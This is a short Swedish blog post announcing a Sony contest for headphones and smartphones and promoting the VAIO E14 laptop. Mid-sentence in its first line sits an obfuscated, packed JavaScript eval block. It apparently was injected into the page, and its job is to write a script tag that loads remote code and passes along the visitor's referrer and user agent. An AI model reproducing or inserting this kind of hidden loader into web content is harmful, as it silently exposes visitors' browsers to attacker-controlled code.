Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Tävla med Sony och vinn fina priser

Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydisb|var|u0026u|referrer|fhbsz||js|php’.split(’|’),0,{}))
drar Sony igång en ny tävling där du kan vinna hörlurar och smartphones av högsta kvalitet.

Gillar du musik är denna tävling precis det du är ute efter. Smartphones framtagna för musikälskare i alla åldrar och så klart ett par riktigt läckra hörlurar att lyssna med.

För att vara med i tävlingen klickar du här

Förutom snygga smartphones och hörlurar har Sony nu också släppt sin nya VAIO laptop E14 som är en super snabb maskin som sätter musiken i fokus. Köper man en VAIO E14 bjuder också Sony på 6 månaders gratis prenumeration av deras egna musiktjänst Music Unlimited.

Var med och tävla idag!